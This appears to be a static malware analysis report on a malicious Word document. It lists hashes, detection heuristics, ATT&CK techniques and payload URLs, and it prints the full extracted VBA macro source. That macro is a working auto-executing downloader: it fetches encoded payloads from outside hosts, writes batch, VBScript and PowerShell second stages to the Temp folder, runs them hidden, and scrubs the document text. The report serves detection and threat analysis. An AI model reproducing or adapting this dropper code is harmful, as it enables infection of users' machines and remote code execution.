Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60e58c720cec28cc…

MALICIOUS

Office (OLE)

48.0 KB Created: 2015-04-28 04:55:00 Authoring application: Microsoft Office Word First seen: 2015-05-10
MD5: 4652d325e213d0f7616787d6b3610d85 SHA-1: fb12d12d11d32b9323c6f939b444429f2e4924a0 SHA-256: 60e58c720cec28cc0f706dbc77d9f125021c52fbc7af9f70080e10abbd68e67a
354 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains VBA macros with an Auto_Open subroutine that executes a Shell command. The script attempts to download content from multiple URLs, including 'http://1023.co.za/feng/tmp/1562762.txt', and appears to be assembling a second-stage payload. The presence of CreateObject and GetObject calls further supports the dynamic execution of code.

Heuristics 13

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell(b, 0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("MSXML2.ServerXMLHTTP")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Quick = GetObject(a)
  • Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Environ(a)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://1023.co.za/feng/tmp/lns.txt In document text (OLE body)
    • http://aktech.in/office/tmp/lns.txtIn document text (OLE body)
    • http://1023.co.za/feng/tmp/1562762.txtReferenced by macro
    • http://aktech.in/office/tmp/1562762.txtIn document text (OLE body)
    • http://1023.co.za/feng/tmp/1562762.txt123123123Referenced by macro
    • http://savepic.su/5633143.pngReferenced by macro
    • http://savepic.su/5619831.pngReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7763 bytes
SHA-256: 3f641c35a112a9eaf4c16ec6ff67fcfc112d5a2aaa7d7ec787b510d8e85b5245
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
 
Sub Auto_Open()
    gyuqgwdbjhqgwuidqgqw
End Sub
Sub Jnduwqihbhbjashbd_Open()
    bdjqhkahsdjbqwhjdbqw
End Sub

Sub Nnwjkdnqkjbdwqjhwqbhj()
    bdjqhkahsdjbqwhjdbqw
End Sub
Sub gyuqgwdbjhqgwuidqgqw()
    Dim huwe, auwd As Integer
    Dim retVal As Variant
    HUWQD = Module1.Hwydbhqw(20000)
    FL2 = HUWQD
    HPPSDJ = "Temp"
    PH2 = Module1.Bad("" & HPPSDJ) + "\"
    NDUWGD = "461237618273612"
    
    HYWDAX = "bauhaukdhwqkhduqkwhdkqwbdmqhwdbhjqwbdjqhwbdjqhwbt"
    JWIDJIAAA = Chr(97 + Sgn(5)) + "a"
    HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
    WKDOQ = NDUWGD
    PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
    + _
    "1"
    VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & "s" & ""
    huwe = 1
    BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
    
     INTG = "" & "o" & "bject"
    AFTG = "m" & "odule"
    
    SXE = "" & Chr(Asc(".")) & Chr(101) & "xe" & ""
    GNG = ".png"
    
    PHT = "" & "htt" & "p://" & ""
    SPIC = PHT + "sav" & "epic.su/"
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = PH2 + BAFL
    
    DRT = FreeFile
    BFT = FreeFile
    CFT = FreeFile
    DFT = FreeFile
    EFT = FreeFile
    
    Dim PBIn As String, asdwq As String, MIWDWQ As String
    
    PBIn = "http://1023.co.za/feng/tmp/1562762.txt"
    CONT = Module1.Net(PBIn)
    asdwq = CONT
    
     HQUWDAAA = "0"
    If (asdwq = "") Then
        PBIn = "http://aktech.in/office/tmp/1562762.txt"
        CONT = Module1.Net(PBIn)
        asdwq = CONT
        HQUWDAAA = "1"
    End If
    
    CONT = Module1.Huwdbyqxv(asdwq)
     
    TVT10 = Module1.Tort(CONT, "text10")
    TVT20 = Module1.Tort(CONT, "text20")
    TVT21 = Module1.Tort(CONT, "text21")
    TVT30 = Module1.Tort(CONT, "text30")
    TVT31 = Module1.Tort(CONT, "text31")
    XPT1 = Module1.Tort(CONT, "stext1")
    XPT2 = Module1.Tort(CONT, "stext2")
    XPT3 = Module1.Tort(CONT, "stext3")
    
    WVR = Module1.Bad("USE" & "RPROFILE")
    UQHWDIHQW = "kqwh kejqwhejk2h 1jkhe k1j2hej2k1h 1kj2e"
    hufehu1 = InStr(WVR, "sers\")
    
    Dim hudhw As Integer
    Dim ghdAdd(1 To 3)
    ghdAdd(1) = "1"
    ghdAdd(2) = "0"
    ghdAdd(3) = "0"
    
    If (hufehu1 <> 0) Then
        ghdAdd(1) = "2"
    Else
        ghdAdd(2) = "3"
    End If
    
    JHWQUD = Join(ghdAdd)
    hudhw = Val(JHWQUD)
    
    Module1.WaitFor (1)
    
    MIWDWQ = "http://1023.co.za/feng/tmp/lns.txt"
    If (HQUWDAAA = "1") Then
        MIWDWQ = "http://aktech.in/office/tmp/lns.txt"
    End If
    
    SEXX = Module1.Net(MIWDWQ)
    
    PSTB = PBIn + "123123123"
    STAR1 = SPIC + "5633143" + GNG
    STAR2 = SPIC + "5619831" + GNG
    FFQ = "8"
    FF = FFQ + SXE
    
    If (hudhw = 130) Then
     Open BAPTH For Output As #DRT
     Print #DRT, XPT1
     Print #DRT, ":qjido"
     Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
     Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
     Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
     Print #DRT, XPT2
     Close #DRT
     
     Module1.WaitFor (1)
     
     Open VBPTH For Output As #BFT
     Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
     Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
     Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
     Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
     Print #BFT, XPT3
     Close #BFT
     
     Module1.WaitFor (1)
     NTH1 = Module1.Freat(retVal, BAPTH)
     
     End If
     
     
     If (hudhw = 200) Then
     ZPQSKD = FL2
     Open PSPTH For Output As #CFT
     Print #CFT, "$ujdkwq = 'jqwdb';"
     Print #CFT, "$stat = '" + STAR2 + "';"
     Print #CFT, "$ggtt  = '" + SEXX + "';"
     Print #CFT, "$pths = '" + PH2 + "';"
     
     Print #CFT, "$wehs = '" + ZPQSKD + "';"
     Print #CFT, "$nnm = '" + FFQ + "';"
     Print #CFT, TVT10
     Close #CFT
     
     Open VBPTH For Output As #DFT
     Print #DFT, TVT30
     Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
     Print #DFT, TVT31
     Close #DFT
    
     Open BAPTH For Output As #EFT
     Print #EFT, "@echo off"
     Print #EFT, TVT20
     Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
     Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
     Print #EFT, TVT21
     Close #EFT
     Module1.WaitFor (1)
    
     NTH2 = Module1.Freat(retVal, BAPTH)
     
     End If
     
    JUW = Chr(47)
    AKK = Chr(60)
    ZKK = ">"
    NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
    NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
    NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
    NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
    NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
    NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)

    
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Attribute VB_Name = "Module1"
Public Function Hwydbhqw(a As Integer)
Hwydbhqw = CStr(Int((a * Rnd) + 10000))
End Function

Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Freat(a As Variant, b)
a = _
Shell(b, 0)
Freat = a
End Function

Public Function Net(a As String)
Dim iwefih As Object
Dim HUW As String
Set iwefih = _
CreateObject("MSXML2.ServerXMLHTTP")
iwefih.Open "GET", a
iwefih.Send ""
HUW = iwefih.ResponseText
Net = HUW
End Function

Public Function Tort(a, b As String)
Dim krd, lent As Integer
UQWD = "<"
NDUW = ">"
krd = InStr(1, a, UQWD + b + NDUW) + 8
lent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
KLMN = Mid(a, krd, lent)
AUHWUD = KLMN
Tort = AUHWUD
End Function

Public Function Huwdbyqxv(ByVal strData As String) As String
    Dim objXML As Object
    Dim objNode As Object
    Set objXML = CreateObject("" & "MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    WUDHA = objNode.nodeTypedValue
    Huwdbyqxv = WUDHA
    Set objNode = Nothing
    Set objXML = Nothing
End Function

Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function

Public Function Quick(a As String)
Quick = GetObject(a)
End Function

Public Function Bad(a As String)
Bad = _
Environ(a)
End Function



Attribute VB_Name = "Module2"
Public Function Nybdqwd(a As String, b As String, c As Integer)
Dim selectedText As String
Dim hhhg, selRange As Range
Set hhhg = ActiveDocument.Range
With hhhg.Find
.Text = a
.MatchWholeWord = True
hhhg.Find.Execute
hhhg.Collapse direction:=wdCollapseEnd
NYQDIAYGDH = "jk h32h 4hg32j4f 23f4 hg2f3h4j32f43 21ghh21fj 3g1"
Set selRange = ActiveDocument.Range
QUDHDHGJDWK = "h21 kj3hkj12g3 hj12g3jh1f2 3ghf12 3jh12g3f 12hf3"
selRange.Start = hhhg.End
.Text = b
.MatchWholeWord = True
.Execute
hhhg.Collapse direction:=wdCollapseStart
selRange.End = hhhg.Start
If (c = 1) Then
    selectedText = selRange.Delete
End If
If (c = 2) Then
    selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
    With hhhg.Find
    .Text = a
    .Replacement.Text = Chr(2 + 28 + 2)
    .Wrap = wdFindContinue
    .Execute Replace:=wdReplaceAll
    End With
End If
End With
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.